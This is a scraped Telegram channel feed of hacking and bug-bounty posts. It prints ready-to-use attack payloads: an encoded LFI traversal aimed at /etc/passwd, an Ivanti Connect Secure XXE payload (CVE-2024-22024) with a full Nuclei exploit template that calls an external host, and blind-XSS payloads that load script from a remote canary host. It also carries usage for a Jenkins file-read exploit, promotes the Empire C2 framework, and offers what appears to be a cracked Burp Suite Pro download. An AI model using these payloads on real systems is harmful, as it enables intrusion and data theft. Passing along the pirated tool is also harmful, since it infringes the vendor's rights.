BugCod3 – Telegram
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
👋 LFI Payload 👋

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ Payload (to be base64-encoded):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

Send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi in the SAMLRequest parameter

#bugbountytips #cve #Ivanti

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
JSON Smuggling: A far-fetched intrusion detection evasion technique

🔗 Medium

#infosec #cybersecurity #blueteam

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  description: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2024,kev,xxe,ivanti

variables:
  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950


#Nuclei #Templates #PoC #XXE

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🥩 PDF

#Wordlist #PDF

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
👑 Empire 👑

💬
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

📊 Features:
⚪️ Server/Client Architecture for Multiplayer Support
⚪️ Supports GUI & CLI Clients
⚪️ Fully encrypted communications
⚪️ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
⚪️ Massive library (400+) of supported tools in PowerShell, C#, & Python
⚪️ Donut Integration for shellcode generation
⚪️ Modular plugin interface for custom server features
⚪️ Flexible module interface for adding new tools
⚪️ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
⚪️ In-memory .NET assembly execution
⚪️ Customizable Bypasses
⚪️ JA3/S and JARM Evasion
⚪️ MITRE ATT&CK Integration
⚪️ Integrated Roslyn compiler (Thanks to Covenant)
⚪️ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

🔼 Install:
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh


😸 Github

#Hacktoberfest #C2 #Redteam #Infrastructure

📣 T.me/BugCod3
📣 T.me/LearnExploit
Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎

'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>

AND

'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>

#XSS #Bugbounty #Tip

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Linux for Hackers: LINUX commands you need to know

⬇️ Download

#linux #hacker #video

📣 T.me/BugCod3
📣 T.me/LearnExploit
👁 Burpsuite Pro 👁

🔥 v2024.1.1.1

🔔 BurpBountyPro_v2.8.0

📂 README (en+ru) included; please read it before running BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
H1 asset fetcher

💬
h1finder.sh is a script that collects all program names, then collects all their assets and saves them into wild and non-wild domains.

You can get your API key from 👉HackerOne👈

🔼 Installation:
cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/


💻 Usage:
h1finder -t <token> -u <username> -b <true/false>


⚪️ -t = H1 token
⚪️ -u = H1 username
⚪️ -b = true or false: set it to true if you want bounty-only targets, or to false if you want VDP-only targets

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #Tools

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
‼️ PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks <= 1.9.6 CVSS 9.8 ‼️

Query Fofa: body="/wp-content/themes/bricks/"

📞 PoC
🌐 Nuclei Template

#BugBounty #Tips #Nuclei #Template

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
👺 Free query shodan 1000 result IP "Tips bug bounty" 👺

Example query:
https://shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ip

Download source page

Regex:
grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
👻 All-In-One Regex 👻

💬
For searching leaked keys and secrets, this is a must-have. Here is how I was able to find a P1 recently using BurpSuite. The leaked secrets allowed me to see some employee-related juicy info.

⬇️ Download
🔒 BugCod3

#BugBounty #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🦇 CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner 🦇

💬 Description:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

💻 Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>

or
python CVE-2024-23897.py -i <input_file> -f <file>


📊 Parameters:
⚪️ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

⚪️ -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).

⚪️ -o or --output-file: Export results to file (optional).

⚪️ -p or --port: Specify the port number. Default is 8080 (optional).

⚪️ -f or --file: Specify the file to read on the target system.

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #PoC #Scanner

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
10000 h1 disclosed reports

💬
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

😸 Github

⬇️ Download
🔒 BugCod3

#Python #H1 #Report

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Google Bug Bounty Dorks Generator

🌎 Site

#BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
🕸 DigitalOcean OpenVPN/SOCKS for Burp Suite

💬
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.

👁‍🗨 How to use:
🔤 Download the JAR from build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;
🔤 Load the extension in Burp via the Extensions tab;
🔤 Create a DigitalOcean API token and enter your token on the extension tab "OpenVPN/SOCKS";
🔤 Select an OpenVPN configuration file (.ovpn);
🔤 Click "Deploy" to start deploying the SOCKS and OpenVPN containers on a fresh droplet, and the extension will take care of the rest;
🔤 Allow up to a few minutes for the Docker image to complete installation before the proxy starts responding

📊 Features:
⚪️ Remember your DigitalOcean API token;
⚪️ Remember your OpenVPN configuration file and credentials (optional) per project file;
⚪️ Automatically shut down the droplet when Burp closes or the extension is unloaded;
⚪️ A context menu so you can right-click > enable or disable tunnelling through the VPN
⚪️ Opens a Repeater tab to ifconfig.co to easily verify if the VPN is working correctly

😸 Github

⬇️ Download
🔒 BugCod3

#Burp #Extension #bugbounty

👤 T.me/BugCod3BOT
📣 T.me/BugCod3